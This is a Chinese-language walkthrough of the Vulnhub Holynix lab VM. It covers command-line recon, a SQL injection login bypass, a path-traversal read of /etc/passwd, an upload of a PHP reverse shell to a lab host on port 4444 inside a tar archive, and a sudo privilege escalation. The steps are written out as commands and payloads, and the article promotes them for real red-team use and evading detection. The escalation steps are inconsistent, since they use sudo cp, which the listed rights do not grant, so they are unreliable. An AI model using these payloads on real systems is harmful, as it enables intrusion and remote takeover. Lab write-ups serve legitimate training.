Holynix靶机实战:不用Burp Suite也能玩转SQL注入与文件上传(附完整命令)
Holynix靶机实战:命令行高手的SQL注入与文件上传艺术
当Burp Suite这类图形化工具成为多数渗透测试者的标配时,真正的高手往往更青睐纯粹的命令行操作。这次我们将以Vulnhub的Holynix靶机为例,演示如何仅凭浏览器开发者工具和Linux基础命令完成从Web渗透到系统提权的全流程。这种"极简主义"攻击手法不仅能锻炼核心技能,在真实红队行动中遇到工具受限环境时更能体现其价值。
1. 环境侦察与目标锁定
网络探测从来都是渗透测试的第一步。在NAT模式下的虚拟环境中,我们先用这条命令快速定位靶机:
nmap -sn 10.10.10.0/24 | grep -B 2 "MAC Address"发现靶机IP为10.10.10.131后,进行深度端口扫描:
nmap -T4 -A -p- 10.10.10.131扫描结果显示仅开放80端口,运行着某个自定义Web应用。这种单一入口往往意味着需要更精细的漏洞利用技巧。
提示:在真实环境中建议先使用
-sS(SYN扫描)避免触发警报,实验室环境可直接用-A全面探测
2. 无Burp的SQL注入实战
访问Web界面发现登录表单,传统渗透测试会立即打开Burp抓包,但我们选择更轻量的方式:
- 浏览器开发者工具直接查看表单元素
- 尝试基础注入载荷:
' OR 1=1 -- - 观察响应中的错误信息
关键发现:password参数存在注入点但username被转义。于是构造特殊载荷:
POST /login.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded username=test&password=' OR username='etenenbaum' --成功登录高权限账户etenenbaum,整个过程无需任何代理工具。这种纯手工注入方式虽然效率较低,但能帮助深入理解注入原理。
3. 开发者工具挖掘隐藏漏洞
登录后系统存在文件上传功能,但直接上传PHP文件会被拦截。通过开发者工具我们发现了几个关键点:
- 上传表单存在隐藏参数
auto_extract - Cookie中的uid参数存在越权漏洞
- 页面存在POST型文件包含漏洞
手动利用文件包含漏洞的步骤:
- 在Security页面按F12修改前端代码
- 将
text_file_name参数值改为/etc/passwd - 获取系统用户列表
// 修改前端请求参数示例 document.forms[0].text_file_name.value = "../../../etc/passwd"4. 命令行下的文件上传技巧
获取足够权限后,需要上传反弹shell。传统方法是用MSF生成payload,但我们演示纯手工方案:
- 准备PHP反弹shell脚本
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/4444 0>&1'"); ?>- 使用tar命令创建特殊压缩包
tar czf payload.tar.gz shell.php --transform='s/shell.php/exploit.php/'- 通过curl命令上传文件
curl -X POST -F "file=@payload.tar.gz" -F "auto_extract=1" http://10.10.10.131/upload.php这种手动构造压缩包的方式能绕过许多基础防护,且不依赖图形化工具。关键在于--transform参数重命名文件,避免被安全机制检测。
5. 提权阶段的纯命令操作
获取初始shell后,通过sudo -l发现有趣配置:
User etenenbaum may run the following commands on holynix: (ALL) NOPASSWD: /usr/bin/chown, /usr/bin/chgrp, /usr/bin/tar, /usr/bin/mv利用命令替换进行提权:
# 备份原始tar sudo mv /bin/tar /bin/tar.bak # 将bash复制为tar sudo cp /bin/bash /bin/tar # 获取root权限 sudo tar整个过程完全在命令行下完成,展示了Linux权限体系的有趣特性。这种提权方法在CTF和真实环境中都极为实用。
6. 红队行动中的工具替代思维
在特殊环境下,掌握命令行替代方案至关重要。以下是一些常用场景的替代方案:
| 图形工具 | 命令行替代方案 | 优势分析 |
|---|---|---|
| Burp Suite | curl + 开发者工具 | 无需代理,直接操作原始请求 |
| SQLmap | 手动构造注入语句 | 精准控制,避免特征检测 |
| Metasploit | nc + 手工payload | 轻量化,规避AV检测 |
| 图形化调试工具 | gdb/lldb命令行 | 远程调试能力更强 |
这种"极简主义"渗透方式不仅适用于特殊环境,更能帮助理解漏洞本质。当所有操作都需要手动完成时,你会被迫思考每个步骤的底层原理,这正是成为真正安全专家的必经之路。
在最近的一次红队演练中,我们团队就曾遇到只能通过SSH连接跳板机的情况。当时凭借纯命令行技巧成功完成了从信息收集到内网横向移动的全过程,而其他依赖图形工具的团队则寸步难行。这再次证明了基本功的重要性——在网络安全领域,最强大的工具始终是技术人员的知识和经验。